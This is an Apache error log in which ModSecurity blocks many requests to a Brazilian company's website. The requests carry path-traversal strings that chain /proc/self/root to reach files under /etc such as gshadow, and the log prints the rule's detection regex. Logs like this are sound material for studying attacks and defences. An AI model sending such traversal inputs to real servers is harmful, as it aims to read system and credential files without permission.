[Wed Mar 18 10:45:48.437839 2026] [:error] [pid 19507:tid 140411708356352] [client 74.7.241.31:58484] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqsjNY0UrI5A3LftIyoBAAAAYQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 10:45:49.720223 2026] [:error] [pid 17887:tid 140411658000128] [client 74.7.241.31:50410] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqsjQkwaGbbGflqUZAQmwAAAMo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 10:45:54.756804 2026] [:error] [pid 11816:tid 140411616036608] [client 74.7.243.128:49866] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqskuw_le52K8_3pV3fwQAAAg8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 10:46:02.858340 2026] [:error] [pid 30077:tid 140411725141760] [client 74.7.241.31:50426] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqsmvu8EFLIOrSqIpsD1gAAAkI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 10:46:11.651993 2026] [mime_magic:error] [pid 11816:tid 140411716749056] (70014)End of file found: [client 74.7.243.128:51998] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/usr/bin
[Wed Mar 18 10:46:30.139026 2026] [:error] [pid 19507:tid 140411725141760] [client 216.73.216.191:7032] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/etc/rc4.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqsttY0UrI5A3LftIyoRAAAAYI"]
[Wed Mar 18 10:46:34.059324 2026] [:error] [pid 17887:tid 140411725141760] [client 74.7.243.128:53900] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqsugkwaGbbGflqUZAQuQAAAMI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 10:46:37.704281 2026] [:error] [pid 30077:tid 140411607643904] [client 74.7.243.128:35308] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqsvfu8EFLIOrSqIpsD5QAAAlA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 10:46:41.868297 2026] [:error] [pid 31803:tid 140411540502272] [client 74.7.243.128:46016] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqsv-yqAr6etmhZHNrAgAAAAFg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 10:46:42.485780 2026] [mime_magic:error] [pid 19507:tid 140411590858496] (70014)End of file found: [client 57.141.18.49:58596] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 10:46:55.837522 2026] [:error] [pid 15051:tid 140411565680384] [client 74.7.243.128:46022] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqszSmAPhZkrhU8w4lstAAAAJU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 10:47:01.255902 2026] [:error] [pid 19507:tid 140411582465792] [client 74.7.243.128:59238] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqs1dY0UrI5A3LftIyoggAAAZM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 10:47:36.879624 2026] [:error] [pid 15051:tid 140411641214720] [client 74.7.241.31:40460] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqs-CmAPhZkrhU8w4ls7QAAAIw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 10:47:41.539800 2026] [:error] [pid 11816:tid 140411666392832] [client 74.7.241.31:36298] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqs_ew_le52K8_3pV3gDgAAAgk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 10:47:47.559255 2026] [:error] [pid 15826:tid 140411599251200] [client 74.7.243.128:54602] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/aliases.db"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqtA-oXxyEfFpUF8f9t1wAAAVE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 10:47:48.907272 2026] [:error] [pid 31803:tid 140411683178240] [client 74.7.243.128:42516] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/gshadow"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqtBOyqAr6etmhZHNrAowAAAEc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 10:47:49.518970 2026] [:error] [pid 29882:tid 140411641214720] [client 216.73.216.191:47435] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqtBUzinOy1jxa1j4cVdgAAAQw"]
[Wed Mar 18 10:47:53.191005 2026] [mime_magic:error] [pid 17887:tid 140411691570944] (70014)End of file found: [client 57.141.18.43:33244] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 10:47:53.213794 2026] [mime_magic:error] [pid 30077:tid 140411666392832] (70014)End of file found: [client 57.141.18.8:33246] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 10:47:56.518989 2026] [:error] [pid 31803:tid 140411733534464] [client 74.7.243.128:39134] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqtDOyqAr6etmhZHNrAqwAAAEE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 10:47:59.824263 2026] [:error] [pid 15826:tid 140411733534464] [client 74.7.243.128:39146] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqtD-oXxyEfFpUF8f9t4AAAAUE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 10:48:04.450934 2026] [:error] [pid 11816:tid 140411540502272] [client 74.7.241.31:36314] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqtFOw_le52K8_3pV3gNAAAAhg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 10:48:04.487706 2026] [:error] [pid 31803:tid 140411557287680] [client 74.7.243.128:37056] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqtFOyqAr6etmhZHNrAtQAAAFY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 10:48:05.857296 2026] [:error] [pid 29882:tid 140411641214720] [client 74.7.243.128:37070] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqtFUzinOy1jxa1j4cViwAAAQw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 10:48:07.495942 2026] [:error] [pid 19507:tid 140411582465792] [client 74.7.243.128:37074] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqtF9Y0UrI5A3LftIyo8AAAAZM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
